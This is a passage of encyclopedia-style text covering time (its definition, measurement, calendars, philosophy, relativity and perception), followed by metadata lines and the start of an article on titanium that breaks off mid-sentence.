significant social importance, having economic value ("time is money") as well as personal value, due to an awareness of the limited time in each day and in human life spans. Cultural attitudes towards the human use of time are apparent in the verbs used—from "kill" to "waste" to "pass"—and sayings (like carpe diem). Definition The concept of time can be complex. Multiple notions exist and defining time in a manner applicable to all fields without circularity has consistently eluded scholars. Nevertheless, diverse fields such as business, industry, sports, the sciences, and the performing arts all incorporate some notion of time into their respective measuring systems. Traditional definitions of time involved the observation of periodic motion such as the apparent motion of the sun across the sky, the phases of the moon, and the passage of a free-swinging pendulum. More modern systems include the Global Positioning System, other satellite systems, Coordinated Universal Time and mean solar time. Although these systems differ from one another, with careful measurements they can be synchronized. In physics, time is a fundamental concept to define other quantities, such as velocity. To avoid a circular definition, time in physics is operationally defined as "what a clock reads", specifically a count of repeating events such as the SI second. Although this aids in practical measurements, it does not address the essence of time. Physicists developed the concept of the spacetime continuum, where events are assigned four coordinates: three for space and one for time. Events like particle collisions, supernovas, or rocket launches have coordinates that may vary for different observers, making concepts like "now" and "here" relative. In general relativity, these coordinates do not directly correspond to the causal structure of events. Instead, the spacetime interval is calculated and classified as either space-like or time-like, depending on whether an observer exists that would say the events are separated by space or by time. Since the time required for light to travel a specific distance is the same for all observers—a fact first publicly demonstrated by the Michelson–Morley experiment—all observers will consistently agree on this definition of time as a causal relation. General relativity does not address the nature of time for extremely small intervals where quantum mechanics holds. In quantum mechanics, time is treated as a universal and absolute parameter, differing from general relativity's notion of independent clocks. The problem of time consists of reconciling these two theories. As of 2024, there is no generally accepted theory of quantum general relativity. Measurement Generally speaking, historical methods of temporal measurement, or chronometry, have taken two distinct forms: the calendar, a mathematical tool for organising long intervals of time, and the clock (e.g., watch), a physical mechanism that counts the passage of time. In day-to-day life, a clock was consulted for periods less than a day, whereas a calendar was consulted for periods longer than a day. Increasingly, personal electronic devices display both calendars and clocks simultaneously. The number (as on a clock dial or calendar) that marks the occurrence of a specified event (as to hour or date) is obtained by counting from certain starting date (epoch), and relevant to a certain time zone (including daylight saving time). Precise measurements, as in astronomy, use a fiducial epoch – a central reference point. History of the calendar Artifacts from the Paleolithic suggest that the moon was used to reckon time as early as 6,000 years ago. Lunar calendars were among the first to appear, with years of either 12 or 13 lunar months (either 354 or 384 days). Without intercalation to add days or months to some years, seasons quickly drift in a calendar based solely on twelve lunar months. Lunisolar calendars have a thirteenth month added to some years to make up for the difference between a full year (now known to be about 365.24 days) and a year of just twelve lunar months. The numbers twelve and thirteen came to feature prominently in many cultures, at least partly due to this relationship of months to years. Other early forms of calendars originated in Mesoamerica, particularly in ancient Mayan civilization. These calendars were religiously and astronomically based, with 18 months in a year and 20 days in a month, plus five epagomenal days at the end of the year. The reforms of Julius Caesar in 45 BC put the Roman world on a solar calendar. This Julian calendar was faulty in that its intercalation still allowed the astronomical solstices and equinoxes to advance against it by about 11 minutes per year. Pope Gregory XIII introduced a correction in 1582; the Gregorian calendar was only slowly adopted by different nations over a period of centuries, but it is now by far the most commonly used calendar around the world. During the French Revolution, a new clock and calendar were invented as part of the dechristianization of France and to create a more rational system in order to replace the Gregorian calendar. The French Republican Calendar's days consisted of ten hours of a hundred minutes of a hundred seconds, which marked a deviation from the base 12 (duodecimal) system used in many other devices by many cultures. The system was abolished in 1806. History of other devices A large variety of devices have been invented to measure time. The study of these devices is called horology. An Egyptian device that dates to , similar in shape to a bent T-square, measured the passage of time from the shadow cast by its crossbar on a nonlinear rule. The T was oriented eastward in the mornings. At noon, the device was turned around so that it could cast its shadow in the evening direction. A sundial uses a gnomon to cast a shadow on a set of markings calibrated to the hour. The position of the shadow marks the hour in local time. The idea to separate the day into smaller parts is credited to Egyptians because of their sundials, which operated on a duodecimal system. The importance of the number 12 is due to the number of lunar cycles in a year and the number of stars used to count the passage of night. The most precise timekeeping device of the ancient world was the water clock, or clepsydra, one of which was found in the tomb of Egyptian pharaoh Amenhotep I. They could be used to measure the hours even at night but required manual upkeep to replenish the flow of water. The ancient Greeks and the people from Chaldea (southeastern Mesopotamia) regularly maintained timekeeping records as an essential part of their astronomical observations. Arab inventors and engineers, in particular, made improvements on the use of water clocks up to the Middle Ages. In the 11th century, Chinese inventors and engineers invented the first mechanical clocks driven by an escapement mechanism. The hourglass uses the flow of sand to measure the flow of time. They were used in navigation. Ferdinand Magellan used 18 glasses on each ship for his circumnavigation of the globe (1522). Incense sticks and candles were, and are, commonly used to measure time in temples and churches across the globe. Water clocks, and, later, mechanical clocks, were used to mark the events of the abbeys and monasteries of the Middle Ages. Richard of Wallingford (1292–1336), abbot of St. Alban's abbey, famously built a mechanical clock as an astronomical orrery about 1330. Great advances in accurate time-keeping were made by Galileo Galilei and especially Christiaan Huygens with the invention of pendulum-driven clocks along with the invention of the minute hand by Jost Burgi. The English word clock probably comes from the Middle Dutch word klocke which, in turn, derives from the medieval Latin word clocca, which ultimately derives from Celtic and is cognate with French, Latin, and German words that mean bell. The passage of the hours at sea was marked by bells and denoted the time (see ship's bell). The hours were marked by bells in abbeys as well as at sea. Clocks can range from watches to more exotic varieties such as the Clock of the Long Now. They can be driven by a variety of means, including gravity, springs, and various forms of electrical power, and regulated by a variety of means such as a pendulum. Alarm clocks first appeared in ancient Greece around 250 BC with a water clock that would set off a whistle. This idea was later mechanized by Levi Hutchins and Seth E. Thomas. A chronometer is a portable timekeeper that meets certain precision standards. Initially, the term was used to refer to the marine chronometer, a timepiece used to determine longitude by means of celestial navigation, a precision first achieved by John Harrison. More recently, the term has also been applied to the chronometer watch, a watch that meets precision standards set by the Swiss agency COSC. The most accurate timekeeping devices are atomic clocks, which are accurate to seconds in many millions of years, and are used to calibrate other clocks and timekeeping instruments. Atomic clocks use the frequency of electronic transitions in certain atoms to measure the second. One of the atoms used is caesium; most modern atomic clocks probe caesium with microwaves to determine the frequency of these electron vibrations. Since 1967, the International System of Measurements bases its unit of time, the second, on the properties of caesium atoms. SI defines the second as 9,192,631,770 cycles of the radiation that corresponds to the transition between two electron spin energy levels of the ground state of the 133Cs atom. Today, the Global Positioning System in coordination with the Network Time Protocol can be used to synchronize timekeeping systems across the globe. In medieval philosophical writings, the atom was a unit of time referred to as the smallest possible division of time. The earliest known occurrence in English is in Byrhtferth's Enchiridion (a science text) of 1010–1012, where it was defined as 1/564 of a momentum (1 minutes), and thus equal to 15/94 of a second. It was used in the computus, the process of calculating the date of Easter. , the smallest time interval uncertainty in direct measurements is on the order of 12 attoseconds (1.2 × 10−17 seconds), about 3.7 × 1026 Planck times. Units The second (s) is the SI base unit. A minute (min) is 60 seconds in length (or, rarely, 59 or 61 seconds when leap seconds are employed), and an hour is 60 minutes or 3600 seconds in length. A day is usually 24 hours or 86,400 seconds in length; however, the duration of a calendar day can vary due to Daylight saving time and Leap seconds. Time standards A time standard is a specification for measuring time: assigning a number or calendar date to an instant (point in time), quantifying the duration of a time interval, and establishing a chronology (ordering of events). In modern times, several time specifications have been officially recognized as standards, where formerly they were matters of custom and practice. The invention in 1955 of the caesium atomic clock has led to the replacement of older and purely astronomical time standards such as sidereal time and ephemeris time, for most practical purposes, by newer time standards based wholly or partly on atomic time using the SI second. International Atomic Time (TAI) is the primary international time standard from which other time standards are calculated. Universal Time (UT1) is mean solar time at 0° longitude, computed from astronomical observations. It varies from TAI because of the irregularities in Earth's rotation. Coordinated Universal Time (UTC) is an atomic time scale designed to approximate Universal Time. UTC differs from TAI by an integral number of seconds. UTC is kept within 0.9 second of UT1 by the introduction of one-second steps to UTC, the leap second. The Global Positioning System broadcasts a very precise time signal based on UTC time. The surface of the Earth is split into a number of time zones. Standard time or civil time in a time zone deviates a fixed, round amount, usually a whole number of hours, from some form of Universal Time, usually UTC. Most time zones are exactly one hour apart, and by convention compute their local time as an offset from UTC. For example, time zones at sea are based on UTC. In many locations (but not at sea) these offsets vary twice yearly due to daylight saving time transitions. Some other time standards are used mainly for scientific work. Terrestrial Time is a theoretical ideal scale realized by TAI. Geocentric Coordinate Time and Barycentric Coordinate Time are scales defined as coordinate times in the context of the general theory of relativity. Barycentric Dynamical Time is an older relativistic scale that is still in use. Philosophy Religion Religions which view time as cyclical Many ancient cultures, particularly in the East, had a cyclical view of time. In these traditions, time was often seen as a recurring pattern of ages or cycles, where events and phenomena repeated themselves in a predictable manner. One of the most famous examples of this concept is found in Hindu philosophy, where time is depicted as a wheel called the "Kalachakra" or "Wheel of Time." According to this belief, the universe undergoes endless cycles of creation, preservation, and destruction. Similarly, in other ancient cultures such as those of the Mayans, Aztecs, and Chinese, there were also beliefs in cyclical time, often associated with astronomical observations and calendars. These cultures developed complex systems to track time, seasons, and celestial movements, reflecting their understanding of cyclical patterns in nature and the universe. The cyclical view of time contrasts with the linear concept of time more common in Western thought, where time is seen as progressing in a straight line from past to future without repetition. Time in Abrahamic religions In general, the Islamic and Judeo-Christian world-view regards time as linear and directional, beginning with the act of creation by God. The traditional Christian view sees time ending, teleologically, with the eschatological end of the present order of things, the "end time". In the Old Testament book Ecclesiastes, traditionally ascribed to Solomon (970–928 BC), time (as the Hebrew word עידן, זמן iddan (age, as in "Ice age") zĕman(time) is often translated) is a medium for the passage of predestined events. (Another word, زمان" זמן" zamān, meant time fit for an event, and is used as the modern Arabic, Persian, and Hebrew equivalent to the English word "time".) Time in Greek mythology The Greek language denotes two distinct principles, Chronos and Kairos. The former refers to numeric, or chronological, time. The latter, literally "the right or opportune moment", relates specifically to metaphysical or Divine time. In theology, Kairos is qualitative, as opposed to quantitative. In Greek mythology, Chronos (ancient Greek: Χρόνος) is identified as the Personification of Time. His name in Greek means "time" and is alternatively spelled Chronus (Latin spelling) or Khronos. Chronos is usually portrayed as an old, wise man with a long, gray beard, such as "Father Time". Some English words whose etymological root is khronos/chronos include chronology, chronometer, chronic, anachronism, synchronise, and chronicle. Time in Kabbalah & Rabbinical thought Rabbis sometimes saw time like "an accordion that was expanded and collapsed at will." According to Kabbalists, "time" is a paradox and an illusion. Time in Advaita Vedanta According to Advaita Vedanta, time is integral to the phenomenal world, which lacks independent reality. Time and the phenomenal world are products of maya, influenced by our senses, concepts, and imaginations. The phenomenal world, including time, is seen as impermanent and characterized by plurality, suffering, conflict, and division. Since phenomenal existence is dominated by temporality (kala), everything within time is subject to change and decay. Overcoming pain and death requires knowledge that transcends temporal existence and reveals its eternal foundation. In Western philosophy Two contrasting viewpoints on time divide prominent philosophers. One view is that time is part of the fundamental structure of the universe – a dimension independent of events, in which events occur in sequence. Isaac Newton subscribed to this realist view, and hence it is sometimes referred to as Newtonian time. The opposing view is that time does not refer to any kind of "container" that events and objects "move through", nor to any entity that "flows", but that it is instead part of a fundamental intellectual structure (together with space and number) within which humans sequence and compare events. This second view, in the tradition of Gottfried Leibniz and Immanuel Kant, holds that time is neither an event nor a thing, and thus is not itself measurable nor can it be travelled. Furthermore, it may be that there is a subjective component to time, but whether or not time itself is "felt", as a sensation, or is a judgment, is a matter of debate. In Philosophy, time was questioned throughout the centuries; what time is and if it is real or not. Ancient Greek philosophers asked if time was linear or cyclical and if time was endless or finite. These philosophers had different ways of explaining time; for instance, ancient Indian philosophers had something called the Wheel of Time. It is believed that there was repeating ages over the lifespan of the universe. This led to beliefs like cycles of rebirth and reincarnation. The Greek philosophers believe that the universe was infinite, and was an illusion to humans. Plato believed that time was made by the Creator at the same instant as the heavens. He also says that time is a period of motion of the heavenly bodies. Aristotle believed that time correlated to movement, that time did not exist on its own but was relative to motion of objects. He also believed that time was related to the motion of celestial bodies; the reason that humans can tell time was because of orbital periods and therefore there was a duration on time. The Vedas, the earliest texts on Indian philosophy and Hindu philosophy dating to the late 2nd millennium BC, describe ancient Hindu cosmology, in which the universe goes through repeated cycles of creation, destruction and rebirth, with each cycle lasting 4,320 million years. Ancient Greek philosophers, including Parmenides and Heraclitus, wrote essays on the nature of time. Plato, in the Timaeus, identified time with the period of motion of the heavenly bodies. Aristotle, in Book IV of his Physica defined time as 'number of movement in respect of the before and after'. In Book 11 of his Confessions, St. Augustine of Hippo ruminates on the nature of time, asking, "What then is time? If no one asks me, I know: if I wish to explain it to one that asketh, I know not." He begins to define time by what it is not rather than what it is, an approach similar to that taken in other negative definitions. However, Augustine ends up calling time a "distention" of the mind (Confessions 11.26) by which we simultaneously grasp the past in memory, the present by attention, and the future by expectation. Isaac Newton believed in absolute space and absolute time; Leibniz believed that time and space are relational. The differences between Leibniz's and Newton's interpretations came to a head in the famous Leibniz–Clarke correspondence. Philosophers in the 17th and 18th century questioned if time was real and absolute, or if it was an intellectual concept that humans use to understand and sequence events. These questions lead to realism vs anti-realism; the realists believed that time is a fundamental part of the universe, and be perceived by events happening in a sequence, in a dimension. Isaac Newton said that we are merely occupying time, he also says that humans can only understand relative time. Relative time is a measurement of objects in motion. The anti-realists believed that time is merely a convenient intellectual concept for humans to understand events. This means that time was useless unless there were objects that it could interact with, this was called relational time. René Descartes, John Locke, and David Hume said that one's mind needs to acknowledge time, in order to understand what time is. Immanuel Kant believed that we can not know what something is unless we experience it first hand. Immanuel Kant, in the Critique of Pure Reason, described time as an a priori intuition that allows us (together with the other a priori intuition, space) to comprehend sense experience. With Kant, neither space nor time are conceived as substances, but rather both are elements of a systematic mental framework that necessarily structures the experiences of any rational agent, or observing subject. Kant thought of time as a fundamental part of an abstract conceptual framework, together with space and number, within which we sequence events, quantify their duration, and compare the motions of objects. In this view, time does not refer to any kind of entity that "flows," that objects "move through," or that is a "container" for events. Spatial measurements are used to quantify the extent of and distances between objects, and temporal measurements are used to quantify the durations of and between events. Time was designated by Kant as the purest possible schema of a pure concept or category. Henri Bergson believed that time was neither a real homogeneous medium nor a mental construct, but possesses what he referred to as Duration. Duration, in Bergson's view, was creativity and memory as an essential component of reality. According to Martin Heidegger we do not exist inside time, we are time. Hence, the relationship to the past is a present awareness of having been, which allows the past to exist in the present. The relationship to the future is the state of anticipating a potential possibility, task, or engagement. It is related to the human propensity for caring and being concerned, which causes "being ahead of oneself" when thinking of a pending occurrence. Therefore, this concern for a potential occurrence also allows the future to exist in the present. The present becomes an experience, which is qualitative instead of quantitative. Heidegger seems to think this is the way that a linear relationship with time, or temporal existence, is broken or transcended. We are not stuck in sequential time. We are able to remember the past and project into the future – we have a kind of random access to our representation of temporal existence; we can, in our thoughts, step out of (ecstasis) sequential time. Modern era philosophers asked: is time real or unreal, is time happening all at once or a duration, is time tensed or tenseless, and is there a future to be? There is a theory called the tenseless or B-theory; this theory says that any tensed terminology can be replaced with tenseless terminology. For example, "we will win the game" can be replaced with "we do win the game", taking out the future tense. On the other hand, there is a theory called the tense or A-theory; this theory says that our language has tense verbs for a reason and that the future can not be determined. There is also something called imaginary time, this was from Stephen Hawking, who said that space and imaginary time are finite but have no boundaries. Imaginary time is not real or unreal, it is something that is hard to visualize. Philosophers can agree that physical time exists outside of the human mind and is objective, and psychological time is mind-dependent and subjective. Unreality In 5th century BC Greece, Antiphon the Sophist, in a fragment preserved from his chief work On Truth, held that: "Time is not a reality (hypostasis), but a concept (noêma) or a measure (metron)." Parmenides went further, maintaining that time, motion, and change were illusions, leading to the paradoxes of his follower Zeno. Time as an illusion is also a common theme in Buddhist thought. J. M. E. McTaggart's 1908 The Unreality of Time argues that, since every event has the characteristic of being both present and not present (i.e., future or past), that time is a self-contradictory idea (see also The flow of time). These arguments often center on what it means for something to be unreal. Modern physicists generally believe that time is as real as space – though others, such as Julian Barbour, argue quantum equations of the universe take their true form when expressed in the timeless realm containing every possible now or momentary configuration of the universe. A modern philosophical theory called presentism views the past and the future as human-mind interpretations of movement instead of real parts of time (or "dimensions") which coexist with the present. This theory rejects the existence of all direct interaction with the past or the future, holding only the present as tangible. This is one of the philosophical arguments against time travel. This contrasts with eternalism (all time: present, past and future, is real) and the growing block theory (the present and the past are real, but the future is not). Physical definition Until Einstein's reinterpretation of the physical concepts associated with time and space in 1907, time was considered to be the same everywhere in the universe, with all observers measuring the same time interval for any event. Non-relativistic classical mechanics is based on this Newtonian idea of time. Einstein, in his special theory of relativity, postulated the constancy and finiteness of the speed of light for all observers. He showed that this postulate, together with a reasonable definition for what it means for two events to be simultaneous, requires that distances appear compressed and time intervals appear lengthened for events associated with objects in motion relative to an inertial observer. The theory of special relativity finds a convenient formulation in Minkowski spacetime, a mathematical structure that combines three dimensions of space with a single dimension of time. In this formalism, distances in space can be measured by how long light takes to travel that distance, e.g., a light-year is a measure of distance, and a meter is now defined in terms of how far light travels in a certain amount of time. Two events in Minkowski spacetime are separated by an invariant interval, which can be either space-like, light-like, or time-like. Events that have a time-like separation cannot be simultaneous in any frame of reference, there must be a temporal component (and possibly a spatial one) to their separation. Events that have a space-like separation will be simultaneous in some frame of reference, and there is no frame of reference in which they do not have a spatial separation. Different observers may calculate different distances and different time intervals between two events, but the invariant interval between the events is independent of the observer (and his or her velocity). Arrow of time Unlike space, where an object can travel in the opposite directions (and in 3 dimensions), time appears to have only one dimension and only one direction – the past lies behind, fixed and immutable, while the future lies ahead and is not necessarily fixed. Yet most laws of physics allow any process to proceed both forward and in reverse. There are only a few physical phenomena, that violate the reversibility of time. This time directionality is known as the arrow of time. Acknowledged examples of the arrow of time are: Radiative arrow of time, manifested in waves (e.g. light and sound) travelling only expanding (rather than focusing) in time (see light cone); Entropic arrow of time: according to the second law of thermodynamics an isolated system evolves toward a larger disorder rather than orders spontaneously; Quantum arrow time, which is related to irreversibility of measurement in quantum mechanics according to the Copenhagen interpretation of quantum mechanics; Weak arrow of time: preference for a certain time direction of weak force in particle physics (see violation of CP symmetry); Cosmological arrow of time, which follows the accelerated expansion of the Universe after the Big Bang. The relationship(s) between these different Arrows of Time is a hotly debated topic in theoretical physics. Classical mechanics In non-relativistic classical mechanics, Newton's concept of "relative, apparent, and common time" can be used in the formulation of a prescription for the synchronization of clocks. Events seen by two different observers in motion relative to each other produce a mathematical concept of time that works sufficiently well for describing the everyday phenomena of most people's experience. In the late nineteenth century, physicists encountered problems with the classical understanding of time, in connection with the behavior of electricity and magnetism. Einstein resolved these problems by invoking a method of synchronizing clocks using the constant, finite speed of light as the maximum signal velocity. This led directly to the conclusion that observers in motion relative to one another measure different elapsed times for the same event. Spacetime Time has historically been closely related with space, the two together merging into spacetime in Einstein's special relativity and general relativity. According to these theories, the concept of time depends on the spatial reference frame of the observer, and the human perception, as well as the measurement by instruments such as clocks, are different for observers in relative motion. For example, if a spaceship carrying a clock flies through space at (very nearly) the speed of light, its crew does not notice a change in the speed of time on board their vessel because everything traveling at the same speed slows down at the same rate (including the clock, the crew's thought processes, and the functions of their bodies). However, to a stationary observer watching the spaceship fly by, the spaceship appears flattened in the direction it is traveling and the clock on board the spaceship appears to move very slowly. On the other hand, the crew on board the spaceship also perceives the observer as slowed down and flattened along the spaceship's direction of travel, because both are moving at very nearly the speed of light relative to each other. Because the outside universe appears flattened to the spaceship, the crew perceives themselves as quickly traveling between regions of space that (to the stationary observer) are many light years apart. This is reconciled by the fact that the crew's perception of time is different from the stationary observer's; what seems like seconds to the crew might be hundreds of years to the stationary observer. In either case, however, causality remains unchanged: the past is the set of events that can send light signals to an entity and the future is the set of events to which an entity can send light signals. Dilation Einstein showed in his thought experiments that people travelling at different speeds, while agreeing on cause and effect, measure different time separations between events, and can even observe different chronological orderings between non-causally related events. Though these effects are typically minute in the human experience, the effect becomes much more pronounced for objects moving at speeds approaching the speed of light. Subatomic particles exist for a well-known average fraction of a second in a lab relatively at rest, but when travelling close to the speed of light they are measured to travel farther and exist for much longer than when at rest. According to the special theory of relativity, in the high-speed particle's frame of reference, it exists, on the average, for a standard amount of time known as its mean lifetime, and the distance it travels in that time is zero, because its velocity is zero. Relative to a frame of reference at rest, time seems to "slow down" for the particle. Relative to the high-speed particle, distances seem to shorten. Einstein showed how both temporal and spatial dimensions can be altered (or "warped") by high-speed motion. Einstein (The Meaning of Relativity): "Two events taking place at the points A and B of a system K are simultaneous if they appear at the same instant when observed from the middle point, M, of the interval AB. Time is then defined as the ensemble of the indications of similar clocks, at rest relative to K, which register the same simultaneously." Einstein wrote in his book, Relativity, that simultaneity is also relative, i.e., two events that appear simultaneous to an observer in a particular inertial reference frame need not be judged as simultaneous by a second observer in a different inertial frame of reference. Relativistic versus Newtonian The animations visualise the different treatments of time in the Newtonian and the relativistic descriptions. At the heart of these differences are the Galilean and Lorentz transformations applicable in the Newtonian and relativistic theories, respectively. In the figures, the vertical direction indicates time. The horizontal direction indicates distance (only one spatial dimension is taken into account), and the thick dashed curve is the spacetime trajectory ("world line") of the observer. The small dots indicate specific (past and future) events in spacetime. The slope of the world line (deviation from being vertical) gives the relative velocity to the observer. In both pictures the view of spacetime changes when the observer accelerates. In the Newtonian description these changes are such that time is absolute: the movements of the observer do not influence whether an event occurs in the 'now' (i.e., whether an event passes the horizontal line through the observer). However, in the relativistic description the observability of events is absolute: the movements of the observer do not influence whether an event passes the "light cone" of the observer. Notice that with the change from a Newtonian to a relativistic description, the concept of absolute time is no longer applicable: events move up and down in the figure depending on the acceleration of the observer. Quantization Time quantization is a hypothetical concept. In the modern established physical theories (the Standard Model of Particles and Interactions and General Relativity) time is not quantized. Planck time (~ 5.4 × 10−44 seconds) is the unit of time in the system of natural units known as Planck units. Current established physical theories are believed to fail at this time scale, and many physicists expect that the Planck time might be the smallest unit of time that could ever be measured, even in principle. Tentative physical theories that describe this time scale exist; see for instance loop quantum gravity. Thermodynamics The second law of thermodynamics states that entropy must increase over time (see Entropy). This can be in either direction – Brian Greene theorizes that, according to the equations, the change in entropy occurs symmetrically whether going forward or backward in time. So entropy tends to increase in either direction, and our current low-entropy universe is a statistical aberration, in a similar manner as tossing a coin often enough that eventually heads will result ten times in a row. However, this theory is not supported empirically in local experiment. Travel Time travel is the concept of moving backwards or forwards to different points in time, in a manner analogous to moving through space, and different from the normal "flow" of time to an earthbound observer. In this view, all points in time (including future times) "persist" in some way. Time travel has been a plot device in fiction since the 19th century. Travelling backwards or forwards in time has never been verified as a process, and doing so presents many theoretical problems and contradictive logic which to date have not been overcome. Any technological device, whether fictional or hypothetical, that is used to achieve time travel is known as a time machine. A central problem with time travel to the past is the violation of causality; should an effect precede its cause, it would give rise to the possibility of a temporal paradox. Some interpretations of time travel resolve this by accepting the possibility of travel between branch points, parallel realities, or universes. Another solution to the problem of causality-based temporal paradoxes is that such paradoxes cannot arise simply because they have not arisen. As illustrated in numerous works of fiction, free will either ceases to exist in the past or the outcomes of such decisions are predetermined. As such, it would not be possible to enact the grandfather paradox because it is a historical fact that one's grandfather was not killed before his child (one's parent) was conceived. This view does not simply hold that history is an unchangeable constant, but that any change made by a hypothetical future time traveller would already have happened in his or her past, resulting in the reality that the traveller moves from. More elaboration on this view can be found in the Novikov self-consistency principle. Perception The specious present refers to the time duration wherein one's perceptions are considered to be in the present. The experienced present is said to be 'specious' in that, unlike the objective present, it is an interval and not a durationless instant. The term specious present was first introduced by the psychologist E. R. Clay, and later developed by William James. Biopsychology The brain's judgment of time is known to be a highly distributed system, including at least the cerebral cortex, cerebellum and basal ganglia as its components. One particular component, the suprachiasmatic nuclei, is responsible for the circadian (or daily) rhythm, while other cell clusters appear capable of shorter-range (ultradian) timekeeping. Psychoactive drugs can impair the judgment of time. Stimulants can lead both humans and rats to overestimate time intervals, while depressants can have the opposite effect. The level of activity in the brain of neurotransmitters such as dopamine and norepinephrine may be the reason for this. Such chemicals will either excite or inhibit the firing of neurons in the brain, with a greater firing rate allowing the brain to register the occurrence of more events within a given interval (speed up time) and a decreased firing rate reducing the brain's capacity to distinguish events occurring within a given interval (slow down time). Mental chronometry is the use of response time in perceptual-motor tasks to infer the content, duration, and temporal sequencing of cognitive operations. Early childhood education Children's expanding cognitive abilities allow them to understand time more clearly. Two- and three-year-olds' understanding of time is mainly limited to "now and not now". Five- and six-year-olds can grasp the ideas of past, present, and future. Seven- to ten-year-olds can use clocks and calendars. Alterations In addition to psychoactive drugs, judgments of time can be altered by temporal illusions (like the kappa effect), age, and hypnosis. The sense of time is impaired in some people with neurological diseases such as Parkinson's disease and attention deficit disorder. Psychologists assert that time seems to go faster with age, but the literature on this age-related perception of time remains controversial. Those who support this notion argue that young people, having more excitatory neurotransmitters, are able to cope with faster external events. Spatial conceptualization Although time is regarded as an abstract concept, there is increasing evidence that time is conceptualized in the mind in terms of space. That is, instead of thinking about time in a general, abstract way, humans think about time in a spatial way and mentally organize it as such. Using space to think about time allows humans to mentally organize temporal events in a specific way. This spatial representation of time is often represented in the mind as a Mental Time Line (MTL). Using space to think about time allows humans to mentally organize temporal order. These origins are shaped by many environmental factors––for example, literacy appears to play a large role in the different types of MTLs, as reading/writing direction provides an everyday temporal orientation that differs from culture to culture. In western cultures, the MTL may unfold rightward (with the past on the left and the future on the right) since people read and write from left to right. Western calendars also continue this trend by placing the past on the left with the future progressing toward the right. Conversely, Arabic, Farsi, Urdu and Israeli-Hebrew speakers read from right to left, and their MTLs unfold leftward (past on the right with future on the left), and evidence suggests these speakers organize time events in their minds like this as well. This linguistic evidence that abstract concepts are based in spatial concepts also reveals that the way humans mentally organize time events varies across cultures––that is, a certain specific mental organization system is not universal. So, although Western cultures typically associate past events with the left and future events with the right according to a certain MTL, this kind of horizontal, egocentric MTL is not the spatial organization of all cultures. Although most developed nations use an egocentric spatial system, there is recent evidence that some cultures use an allocentric spatialization, often based on environmental features. A study of the indigenous Yupno people of Papua New Guinea focused on the directional gestures used when individuals used time-related words. When speaking of the past (such as "last year" or "past times"), individuals gestured downhill, where the river of the valley flowed into the ocean. When speaking of the future, they gestured uphill, toward the source of the river. This was common regardless of which direction the person faced, revealing that the Yupno people may use an allocentric MTL, in which time flows uphill. A similar study of the Pormpuraawans, an aboriginal group in Australia, revealed a similar distinction in which when asked to organize photos of a man aging "in order," individuals consistently placed the youngest photos to the east and the oldest photos to the west, regardless of which direction they faced. This directly clashed with an American group that consistently organized the photos from left to right. Therefore, this group also appears to have an allocentric MTL, but based on the cardinal directions instead of geographical features. The wide array of distinctions in the way different groups think about time leads to the broader question that different groups may also think about other abstract concepts in different ways as well, such as causality and number. Use In sociology and anthropology, time discipline is the general name given to social and economic rules, conventions, customs, and expectations governing the measurement of time, the social currency and awareness of time measurements, and people's expectations concerning the observance of these customs by others. Arlie Russell Hochschild and Norbert Elias have written on the use of time from a sociological perspective. The use of time is an important issue in understanding human behavior, education, and travel behavior. Time-use research is a developing field of study. The question concerns how time is allocated across a number of activities (such as time spent at home, at work, shopping, etc.). Time use changes with technology, as the television or the Internet created new opportunities to use time in different ways. However, some aspects of time use are relatively stable over long periods of time, such as the amount of time spent traveling to work, which despite major changes in transport, has been observed to be about 20–30 minutes one-way for a large number of cities over a long period. Time management is the organization of tasks or events by first estimating how much time a task requires and when it must be completed, and adjusting events that would interfere with its completion so it is done in the appropriate amount of time. Calendars and day planners are common examples of time management tools. Sequence of events A sequence of events, or series of events, is a sequence of items, facts, events, actions, changes, or procedural steps, arranged in time order (chronological order), often with causality relationships among the items. Because of causality, cause precedes effect, or cause and effect may appear together in a single item, but effect never precedes cause. A sequence of events can be presented in text, tables, charts, or timelines. The description of the items or events may include a timestamp. A sequence of events that includes the time along with place or location information to describe a sequential path may be referred to as a world line. Uses of a sequence of events include stories, historical events (chronology), directions and steps in procedures, and timetables for scheduling activities. A sequence of events may also be used to help describe processes in science, technology, and medicine. A sequence of events may be focused on past events (e.g., stories, history, chronology), on future events that must be in a predetermined order (e.g., plans, schedules, procedures, timetables), or focused on the observation of past events with the expectation that the events will occur in the future (e.g., processes, projections). The use of a sequence of events occurs in fields as diverse as machines (cam timer), documentaries (Seconds From Disaster), law (choice of law), finance (directional-change intrinsic time), computer simulation (discrete event simulation), and electric power transmission (sequence of events recorder). A specific example of a sequence of events is the timeline of the Fukushima Daiichi nuclear disaster.
Physical sciences
Science and medicine
null
30040
https://en.wikipedia.org/wiki/Titanium
Titanium
Titanium is a chemical element; it has symbol Ti and atomic number 22. Found in nature only as an oxide, it can be reduced to produce a lustrous transition metal with a silver color, low density, and high strength, resistant to corrosion in sea water, aqua regia, and chlorine. Titanium was discovered in Cornwall, Great Britain, by William Gregor in 1791 and was named by Martin Heinrich Klaproth after the Titans of Greek mythology. The element occurs within a number of minerals, principally rutile and ilmenite, which are widely distributed in the Earth's crust and lithosphere; it is found in almost all living things, as well as bodies of water, rocks, and soils. The metal is extracted from its principal mineral ores by the Kroll and Hunter processes. The most common compound, titanium dioxide, is a popular photocatalyst and is used in the manufacture of white pigments. Other compounds include titanium tetrachloride (TiCl4), a component of smoke screens and catalysts; and titanium trichloride (TiCl3), which is used as a catalyst in the production of polypropylene. Titanium can be alloyed with iron, aluminium, vanadium, and molybdenum, among other elements. The resulting titanium alloys are strong, lightweight, and versatile, with applications including aerospace (jet engines, missiles, and spacecraft), military, industrial processes (chemicals and petrochemicals, desalination plants, pulp, and paper), automotive, agriculture (farming), sporting goods, jewelry, and consumer electronics. Titanium is also considered one of the most biocompatible metals, leading to a range of medical applications including prostheses, orthopedic implants, dental implants, and surgical instruments. The two most useful properties of the metal are corrosion resistance and strength-to-density ratio, the highest of any metallic element. In its unalloyed condition, titanium is as strong as some steels, but less dense. There are two allotropic forms and five naturally occurring isotopes of this element, Ti through Ti, with Ti being the most abundant (73.8%). Characteristics Physical properties As a metal, titanium is recognized for its high strength-to-weight ratio. It is a strong metal with low density that is quite ductile (especially in an oxygen-free environment), lustrous, and metallic-white in color. Due to its relatively high melting point (1,668 °C or 3,034 °F) it has sometimes been described as a refractory metal, but this is not the case. It is paramagnetic and has fairly low electrical and thermal conductivity compared to other metals. Titanium is superconducting when cooled below its critical temperature of 0.49 K. Commercially pure (99.2% pure) grades of titanium have ultimate tensile strength of about 434 MPa (63,000 psi), equal to that of common, low-grade steel alloys, but are less dense. Titanium is 60% denser than aluminium, but more than twice as strong as the most commonly used 6061-T6 aluminium alloy. Certain titanium alloys (e.g., Beta C) achieve tensile 